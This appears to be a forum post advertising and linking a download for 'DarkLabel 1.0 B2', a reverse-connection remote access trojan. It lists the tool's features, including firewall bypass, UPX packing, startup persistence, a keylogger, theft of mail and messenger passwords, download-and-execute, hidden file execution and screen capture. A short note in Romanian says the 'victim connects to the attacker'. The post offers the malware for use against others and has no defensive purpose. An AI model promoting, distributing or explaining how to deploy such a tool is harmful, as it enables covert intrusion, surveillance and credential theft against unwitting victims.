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DarkLabel 1.0 B2

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DarkLabel 1.0 B2

Compiled at 27/9/2007

Made in Egypt by dLinSide


DarkLabel is a firewall bypass reverse connection remote administration tool, that allows you to remotely control computers that are behind firewalls and routers.

+ Server is 132 KB UnPacked , 36 KB Packed with UPX


[ Features ]


+ ActiveX Startup

+ Encrypted Connection

+ Multiple DNS/IP Addresses

+ Client can listen on Multiple Ports

+ One port usage for everything

+ MSN Style Notifications with Sounds

+ Administration : Sleep, Redirect, Close, Uninstall

+ Information (IP, HostName, Country, Language, OS, Uptime, WinDir, ID, FileName, ActiveX Key, Path)

+ File Manager (Up, Back, Refresh, Delete File(s), Rename File, Copy File, Execute File : - Hidden - Normal, Archive File(s), Extract File(s), Make Dir, Rename Dir, Delete Dir, Delete Empty Dir, Upload File, Download File(s)) *Drag and Drop for multiple file to upload*

- File Search (Include Sub Dirs, Manage Folder, Delete, Rename, Copy, Execute : - Hidden - Normal, Download)

+ Process Manager (Terminate)

+ Key Manager : - Offline Logs (Download, Delete Log(s), Delete All Logs) *Colored & Highlighted HTML Log*, - Online Logger (Auto Replace, Send Keys, Copy to Clipboard, Save to File) *Colored & Highlighted*

+ Downloader (New : -Download - Download/Execute - Resume - Resume/Execute, Retry, Pause, Cancel) *Multiple*

+ Screen Manager (Take, Timer, Settings : - Quality - Size 25% 50% 100%, Save, Auto Save)

+ Window Manager (Close, Hide, Show, Maximize, Minimize, Restore)

+ Passwords : - Mail - Messenger - Protected

+ Others : - MSG Manager - Run URL/File

+ Broadcast Commands : Sleep, Redirect, Close, Uninstall, Download/Execute, File Search, Log Off, Restart, Turn Off

+ File Transfer *Multiple*


Download: http://rapidshare.com/files/62882973/DarkLabel_1.0_B2.rar


firewall bypass. Adica trece de firewall si router. daca esti intr-o retea cu router. ip-ul de internet sta pe router si fiecare calculator din retea are ip local(192.168...) si atunci trebuie sa faci conexiune inversa. adica victima se conecteaza la atacator.

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